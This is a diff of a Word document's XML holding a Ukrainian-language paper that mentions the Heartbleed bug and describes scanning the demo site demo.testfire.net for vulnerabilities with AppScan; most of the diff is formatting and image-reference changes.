+        <w:t xml:space="preserve"> Web-додаток використовує Open Source-компоненти, наприклад, бібліотеку OpenSSL, що забезпечує TLS / SSH-шифрування Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>сайтів (HTTPS). У квітні 2014 року в декількох версіях цієї бібліотеки була виявлена критична вразливість CVE-2014-0160, відома як Heartbleed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26982,7 +27462,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -27062,61 +27541,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -29278,10 +29702,11 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:color w:val="2A2A2A"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -29295,44 +29720,135 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Основною задачею програмного комплексу </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">є проведення тестування в автоматичному режимі веб-додатків або веб-сервісів на наявність в них вразливостей </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> системі безпеки.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Спочатку необхідно ввести адресу сайту, який буде тестуватися на наявність вразливостей та перевірити наявність з</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>’эднання з сервером.</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В рамках дослідження на прикладі ресурсу </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="C0504D" w:themeColor="accent2"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:lang w:val="uk-UA"/>
+          </w:rPr>
+          <w:t>https://demo.testfire.net</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="C0504D" w:themeColor="accent2"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> буде показано всі фази проведення тестування </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -29341,28 +29857,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Для</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> прикладу було викоористано </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -29372,6 +29866,61 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:t>Спочатку необхідно ввести адресу сайту, який буде тестуватися на наявність вразливостей та перевірити наявність з</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>’эднання з сервером.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> прикладу було викоористано </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
         <w:t>веб-додаток</w:t>
       </w:r>
       <w:r>
@@ -29384,7 +29933,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId14" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a7"/>
@@ -29438,7 +29987,7 @@
                       <pic:cNvPicPr/>
                     </pic:nvPicPr>
                     <pic:blipFill>
-                      <a:blip r:embed="rId15"/>
+                      <a:blip r:embed="rId16"/>
                       <a:stretch>
                         <a:fillRect/>
                       </a:stretch>
@@ -29538,7 +30087,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -29777,84 +30326,6 @@
             <wp:extent cx="5940425" cy="2813563"/>
             <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
             <wp:docPr id="11" name="Рисунок 11"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="2813563"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>Після завершення тестування програма видає список знайдених вразливостей відсортованих по серйозності:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456A138B" wp14:editId="117C97D0">
-            <wp:extent cx="5940425" cy="3594052"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
-            <wp:docPr id="13" name="Рисунок 13"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -29874,7 +30345,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="3594052"/>
+                      <a:ext cx="5940425" cy="2813563"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -29908,9 +30379,12 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>Для кожної знайденої вразливості можна подивитись детальну інформацію</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Після завершення тестування програма видає список знайдених вразливостей відсортованих по серйозності:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -29919,43 +30393,17 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> про те, як було модифіковано запит і яку відповідь в результаті було отримано</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8B1A5" wp14:editId="5B23F1CA">
-            <wp:extent cx="4203190" cy="6020230"/>
-            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
-            <wp:docPr id="14" name="Рисунок 14"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456A138B" wp14:editId="117C97D0">
+            <wp:extent cx="5940425" cy="3594052"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
+            <wp:docPr id="13" name="Рисунок 13"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -29975,7 +30423,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4204123" cy="6021567"/>
+                      <a:ext cx="5940425" cy="3594052"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -30002,15 +30450,61 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Для кожної знайденої вразливості можна подивитись детальну інформацію</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> про те, як було модифіковано запит і яку відповідь в результаті було отримано</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFAD20" wp14:editId="47A156D4">
-            <wp:extent cx="5332780" cy="4331061"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-            <wp:docPr id="15" name="Рисунок 15"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8B1A5" wp14:editId="5B23F1CA">
+            <wp:extent cx="4203190" cy="6020230"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
+            <wp:docPr id="14" name="Рисунок 14"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -30030,7 +30524,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5338300" cy="4335544"/>
+                      <a:ext cx="4204123" cy="6021567"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -30057,49 +30551,15 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Коментарі з можливими причинами виникнення </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>дефекту:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138CD152" wp14:editId="1C46E326">
-            <wp:extent cx="3467404" cy="4170260"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="16" name="Рисунок 16"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFAD20" wp14:editId="47A156D4">
+            <wp:extent cx="5332780" cy="4331061"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="15" name="Рисунок 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -30119,7 +30579,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3470856" cy="4174411"/>
+                      <a:ext cx="5338300" cy="4335544"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -30153,8 +30613,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Та поради щодо способів виправлення вихідного код</w:t>
+        <w:t xml:space="preserve">Коментарі з можливими причинами виникнення </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -30165,7 +30624,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>у з метою виправити вразливість:</w:t>
+        <w:t>дефекту:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30186,10 +30645,10 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69E524" wp14:editId="647F1360">
-            <wp:extent cx="5940425" cy="7144573"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="17" name="Рисунок 17"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138CD152" wp14:editId="1C46E326">
+            <wp:extent cx="3467404" cy="4170260"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="16" name="Рисунок 16"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -30209,6 +30668,96 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="3470856" cy="4174411"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
